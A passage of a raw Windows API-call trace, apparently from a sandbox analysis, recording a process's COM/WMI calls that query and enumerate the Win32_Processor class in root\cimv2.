pszText="\\\\.\\root\\cimv2") returned 0x0 [0063.867] CoGetContextToken (in: pToken=0x26cbb8 | out: pToken=0x26cbb8) returned 0x0 [0063.867] WbemLocator:IUnknown:AddRef (This=0x70f4fc) returned 0x3 [0063.867] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca4c | out: ppvObject=0x26ca4c*=0x70f4fc) returned 0x0 [0063.867] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x3 [0063.867] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x2 [0063.867] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cf50*=0x0, pszText=0x0 | out: puBuffLength=0x26cf50*=0x10, pszText=0x0) returned 0x0 [0063.867] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cf50*=0x10, pszText="000000000000000" | out: puBuffLength=0x26cf50*=0x10, pszText="win32_processor") returned 0x0 [0063.890] IWbemServices:GetObject (in: This=0x521d4f4, strObjectPath="win32_processor", lFlags=0, pCtx=0x0, ppObject=0x26cf04*=0x0, ppCallResult=0x0 | out: ppObject=0x26cf04*=0x5221c28, ppCallResult=0x0) returned 0x0 [0063.936] IWbemClassObject:Get (in: This=0x5221c28, wszName="__PATH", lFlags=0, pVal=0x26ceec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26cf94*=0, plFlavor=0x26cf90*=0 | out: pVal=0x26ceec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor", varVal2=0x0), pType=0x26cf94*=8, plFlavor=0x26cf90*=64) returned 0x0 [0063.937] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor") returned 0x4c [0063.937] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor") returned 0x4c [0063.937] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cefc | out: ppv=0x26cefc*=0x6ded34) returned 0x0 [0063.938] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cef4 | out: pAptType=0x26cef4*=1) returned 0x0 [0063.938] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cef8 | out: ppvObject=0x26cef8*=0x0) returned 0x80004002 [0063.938] IUnknown:Release (This=0x6ded34) returned 0x1 [0063.939] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c868 | out: ppv=0x26c868*=0x5210d00) returned 0x0 [0063.939] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210d00, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26ca80 | out: ppvObject=0x26ca80*=0x0) returned 0x80004002 [0063.939] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5210d00, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca94 | out: ppvObject=0x26ca94*=0x521cb98) returned 0x0 [0063.939] WbemDefPath:IUnknown:Release (This=0x5210d00) returned 0x0 [0063.939] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b4 | out: ppvObject=0x26c6b4*=0x521cb98) returned 0x0 [0063.939] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c670 | out: ppvObject=0x26c670*=0x0) returned 0x80004002 [0063.939] WbemDefPath:IUnknown:AddRef (This=0x521cb98) returned 0x3 [0063.939] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26bfcc | out: ppvObject=0x26bfcc*=0x0) returned 0x80004002 [0063.939] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26bf7c | out: ppvObject=0x26bf7c*=0x0) returned 0x80004002 [0063.940] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf88 | out: ppvObject=0x26bf88*=0x6fa058) returned 0x0 [0063.940] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6fa058, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26bf90 | out: pCid=0x26bf90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0063.940] WbemDefPath:IUnknown:Release (This=0x6fa058) returned 0x3 [0063.940] CoGetContextToken (in: pToken=0x26bfe8 | out: pToken=0x26bfe8) returned 0x0 [0063.940] CoGetContextToken (in: pToken=0x26c3f0 | out: pToken=0x26c3f0) returned 0x0 [0063.940] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002 [0063.940] WbemDefPath:IUnknown:Release (This=0x521cb98) returned 0x2 [0063.940] WbemDefPath:IUnknown:Release (This=0x521cb98) returned 0x1 [0063.940] CoGetContextToken (in: pToken=0x26cd78 | out: pToken=0x26cd78) returned 0x0 [0063.940] CoGetContextToken (in: pToken=0x26ccd8 | out: pToken=0x26ccd8) returned 0x0 [0063.940] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cb98, riid=0x26cda8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26cda4 | out: ppvObject=0x26cda4*=0x521cb98) returned 0x0 [0063.940] WbemDefPath:IUnknown:AddRef (This=0x521cb98) returned 0x3 [0063.940] WbemDefPath:IUnknown:Release (This=0x521cb98) returned 0x2 [0063.940] WbemDefPath:IWbemPath:SetText (This=0x521cb98, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_Processor") returned 0x0 [0063.940] IWbemClassObject:Get (in: This=0x5221c28, wszName="__CLASS", lFlags=0, pVal=0x26cf5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26cfdc*=0, plFlavor=0x26cfd8*=0 | out: pVal=0x26cf5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Processor", varVal2=0x0), pType=0x26cfdc*=8, plFlavor=0x26cfd8*=64) returned 0x0 [0063.940] SysStringByteLen (bstr="Win32_Processor") returned 0x1e [0063.940] SysStringByteLen (bstr="Win32_Processor") returned 0x1e [0063.940] CoGetContextToken (in: pToken=0x26cd78 | out: pToken=0x26cd78) returned 0x0 [0063.940] WbemLocator:IUnknown:AddRef (This=0x521d4f4) returned 0x3 [0063.940] IWbemServices:CreateInstanceEnum (in: This=0x521d4f4, strFilter="Win32_Processor", lFlags=17, pCtx=0x0, ppEnum=0x26cf58 | out: ppEnum=0x26cf58*=0x5221f7c) returned 0x0 [0063.944] IUnknown:QueryInterface (in: This=0x5221f7c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cdec | out: ppvObject=0x26cdec*=0x5221f80) returned 0x0 [0063.945] IClientSecurity:QueryBlanket (in: This=0x5221f80, pProxy=0x5221f7c, pAuthnSvc=0x26ce3c, pAuthzSvc=0x26ce38, pServerPrincName=0x26ce30, pAuthnLevel=0x26ce34, pImpLevel=0x26ce24, pAuthInfo=0x26ce28, pCapabilites=0x26ce2c | out: pAuthnSvc=0x26ce3c*=0xa, pAuthzSvc=0x26ce38*=0x0, pServerPrincName=0x26ce30, pAuthnLevel=0x26ce34*=0x6, pImpLevel=0x26ce24*=0x2, pAuthInfo=0x26ce28, pCapabilites=0x26ce2c*=0x1) returned 0x0 [0063.945] IUnknown:Release (This=0x5221f80) returned 0x1 [0063.945] IUnknown:QueryInterface (in: This=0x5221f7c, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cde0 | out: ppvObject=0x26cde0*=0x70f6ec) returned 0x0 [0063.945] IUnknown:QueryInterface (in: This=0x5221f7c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cddc | out: ppvObject=0x26cddc*=0x5221f80) returned 0x0 [0063.945] IClientSecurity:SetBlanket (This=0x5221f80, pProxy=0x5221f7c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0063.950] IUnknown:Release (This=0x5221f80) returned 0x2 [0063.950] WbemLocator:IUnknown:Release (This=0x70f6ec) returned 0x1 [0063.950] CoTaskMemFree (pv=0x700ab8) [0063.950] IUnknown:QueryInterface (in: This=0x5221f7c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c9d4 | out: ppvObject=0x26c9d4*=0x70f6ec) returned 0x0 [0063.950] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c990 | out: ppvObject=0x26c990*=0x0) returned 0x80004002 [0063.951] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c7ac | out: ppvObject=0x26c7ac*=0x0) returned 0x80004002 [0063.951] WbemLocator:IUnknown:AddRef (This=0x70f6ec) returned 0x3 [0063.951] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c2ec | out: ppvObject=0x26c2ec*=0x0) returned 0x80004002 [0063.951] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c29c | out: ppvObject=0x26c29c*=0x0) returned 0x80004002 [0063.952] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2a8 | out: ppvObject=0x26c2a8*=0x70f64c) returned 0x0 [0063.952] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x70f64c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c2b0 | out: pCid=0x26c2b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0063.952] WbemLocator:IUnknown:Release (This=0x70f64c) returned 0x3 [0063.952] CoGetContextToken (in: pToken=0x26c308 | out: pToken=0x26c308) returned 0x0 [0063.952] CoGetContextToken (in: pToken=0x26c710 | out: pToken=0x26c710) returned 0x0 [0063.952] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c7a0 | out: ppvObject=0x26c7a0*=0x70f6d4) returned 0x0 [0063.952] WbemLocator:IRpcOptions:Query (in: This=0x70f6d4, pPrx=0x70f6ec, dwProperty=2, pdwValue=0x26c7c8 | out: pdwValue=0x26c7c8) returned 0x80004002 [0063.952] WbemLocator:IUnknown:Release (This=0x70f6d4) returned 0x3 [0063.952] WbemLocator:IUnknown:Release (This=0x70f6ec) returned 0x2 [0063.952] CoGetContextToken (in: pToken=0x26cce8 | out: pToken=0x26cce8) returned 0x0 [0063.952] CoGetContextToken (in: pToken=0x26cc48 | out: pToken=0x26cc48) returned 0x0 [0063.952] WbemLocator:IUnknown:QueryInterface (in: This=0x70f6ec, riid=0x26cd18*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x26cd14 | out: ppvObject=0x26cd14*=0x5221f7c) returned 0x0 [0063.952] IUnknown:AddRef (This=0x5221f7c) returned 0x4 [0063.952] IUnknown:Release (This=0x5221f7c) returned 0x3 [0063.952] IUnknown:Release (This=0x5221f7c) returned 0x2 [0063.952] WbemLocator:IUnknown:Release (This=0x521d4f4) returned 0x2 [0063.952] SysStringLen (param_1=0x0) returned 0x0 [0063.953] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210b30, puCount=0x26cf94 | out: puCount=0x26cf94*=0x2) returned 0x0 [0063.953] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf90*=0x0, pszText=0x0 | out: puBuffLength=0x26cf90*=0xf, pszText=0x0) returned 0x0 [0063.953] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf90*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf90*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0063.953] CoGetContextToken (in: pToken=0x26cdd8 | out: pToken=0x26cdd8) returned 0x0 [0063.953] IUnknown:AddRef (This=0x5221f7c) returned 0x3 [0063.953] IEnumWbemClassObject:Clone (in: This=0x5221f7c, ppEnum=0x26cf94 | out: ppEnum=0x26cf94*=0x5222044) returned 0x0 [0063.954] IUnknown:QueryInterface (in: This=0x5222044, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce58 | out: ppvObject=0x26ce58*=0x5222048) returned 0x0 [0063.954] IClientSecurity:QueryBlanket (in: This=0x5222048, pProxy=0x5222044, pAuthnSvc=0x26cea8, pAuthzSvc=0x26cea4, pServerPrincName=0x26ce9c, pAuthnLevel=0x26cea0, pImpLevel=0x26ce90, pAuthInfo=0x26ce94, pCapabilites=0x26ce98 | out: pAuthnSvc=0x26cea8*=0xa, pAuthzSvc=0x26cea4*=0x0, pServerPrincName=0x26ce9c, pAuthnLevel=0x26cea0*=0x6, pImpLevel=0x26ce90*=0x2, pAuthInfo=0x26ce94, pCapabilites=0x26ce98*=0x1) returned 0x0 [0063.954] IUnknown:Release (This=0x5222048) returned 0x1 [0063.954] IUnknown:QueryInterface (in: This=0x5222044, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce4c | out: ppvObject=0x26ce4c*=0x7129dc) returned 0x0 [0063.954] IUnknown:QueryInterface (in: This=0x5222044, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce48 | out: ppvObject=0x26ce48*=0x5222048) returned 0x0 [0063.954] IClientSecurity:SetBlanket (This=0x5222048, pProxy=0x5222044, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0063.956] IUnknown:Release (This=0x5222048) returned 0x2 [0063.956] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x1 [0063.956] CoTaskMemFree (pv=0x700a88) [0063.956] IUnknown:QueryInterface (in: This=0x5222044, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca34 | out: ppvObject=0x26ca34*=0x7129dc) returned 0x0 [0063.956] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c9f0 | out: ppvObject=0x26c9f0*=0x0) returned 0x80004002 [0063.957] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c80c | out: ppvObject=0x26c80c*=0x0) returned 0x80004002 [0063.957] WbemLocator:IUnknown:AddRef (This=0x7129dc) returned 0x3 [0063.957] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c34c | out: ppvObject=0x26c34c*=0x0) returned 0x80004002 [0063.958] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c2fc | out: ppvObject=0x26c2fc*=0x0) returned 0x80004002 [0063.958] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c308 | out: ppvObject=0x26c308*=0x71293c) returned 0x0 [0063.958] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x71293c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c310 | out: pCid=0x26c310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0063.958] WbemLocator:IUnknown:Release (This=0x71293c) returned 0x3 [0063.958] CoGetContextToken (in: pToken=0x26c368 | out: pToken=0x26c368) returned 0x0 [0063.958] CoGetContextToken (in: pToken=0x26c770 | out: pToken=0x26c770) returned 0x0 [0063.958] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c800 | out: ppvObject=0x26c800*=0x7129c4) returned 0x0 [0063.958] WbemLocator:IRpcOptions:Query (in: This=0x7129c4, pPrx=0x7129dc, dwProperty=2, pdwValue=0x26c828 | out: pdwValue=0x26c828) returned 0x80004002 [0063.958] WbemLocator:IUnknown:Release (This=0x7129c4) returned 0x3 [0063.958] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x2 [0063.958] CoGetContextToken (in: pToken=0x26cd48 | out: pToken=0x26cd48) returned 0x0 [0063.958] CoGetContextToken (in: pToken=0x26cca8 | out: pToken=0x26cca8) returned 0x0 [0063.958] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x26cd78*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x26cd74 | out: ppvObject=0x26cd74*=0x5222044) returned 0x0 [0063.958] IUnknown:AddRef (This=0x5222044) returned 0x4 [0063.958] IUnknown:Release (This=0x5222044) returned 0x3 [0063.958] IUnknown:Release (This=0x5222044) returned 0x2 [0063.959] IUnknown:Release (This=0x5221f7c) returned 0x2 [0063.959] SysStringLen (param_1=0x0) returned 0x0 [0063.959] IEnumWbemClassObject:Reset (This=0x5222044) returned 0x0 [0063.962] CoTaskMemAlloc (cb=0x4) returned 0x6fa0e8 [0063.962] IEnumWbemClassObject:Next (in: This=0x5222044, lTimeout=-1, uCount=0x1, apObjects=0x6fa0e8, puReturned=0x2280668 | out: apObjects=0x6fa0e8*=0x5222090, puReturned=0x2280668*=0x1) returned 0x0 [0066.091] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c5f8 | out: ppvObject=0x26c5f8*=0x5222090) returned 0x0 [0066.091] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c5b4 | out: ppvObject=0x26c5b4*=0x0) returned 0x80004002 [0066.093] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c3d4 | out: ppvObject=0x26c3d4*=0x0) returned 0x80004002 [0066.093] IUnknown:AddRef (This=0x5222090) returned 0x3 [0066.093] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26bf14 | out: ppvObject=0x26bf14*=0x0) returned 0x80004002 [0066.093] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26bec4 | out: ppvObject=0x26bec4*=0x0) returned 0x80004002 [0066.093] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bed0 | out: ppvObject=0x26bed0*=0x5222094) returned 0x0 [0066.094] IMarshal:GetUnmarshalClass (in: This=0x5222094, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26bed8 | out: pCid=0x26bed8*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0066.094] IUnknown:Release (This=0x5222094) returned 0x3 [0066.094] CoGetContextToken (in: pToken=0x26bf30 | out: pToken=0x26bf30) returned 0x0 [0066.094] CoGetContextToken (in: pToken=0x26c338 | out: pToken=0x26c338) returned 0x0 [0066.094] IUnknown:QueryInterface (in: This=0x5222090, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c3c8 | out: ppvObject=0x26c3c8*=0x0) returned 0x80004002 [0066.094] IUnknown:Release (This=0x5222090) returned 0x2 [0066.094] CoGetContextToken (in: pToken=0x26c908 | out: pToken=0x26c908) returned 0x0 [0066.094] CoGetContextToken (in: pToken=0x26c868 | out: pToken=0x26c868) returned 0x0 [0066.094] IUnknown:QueryInterface (in: This=0x5222090, riid=0x26c938*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26c934 | out: ppvObject=0x26c934*=0x5222090) returned 0x0 [0066.094] IUnknown:AddRef (This=0x5222090) returned 0x4 [0066.094] IUnknown:Release (This=0x5222090) returned 0x3 [0066.095] IUnknown:Release (This=0x5222090) 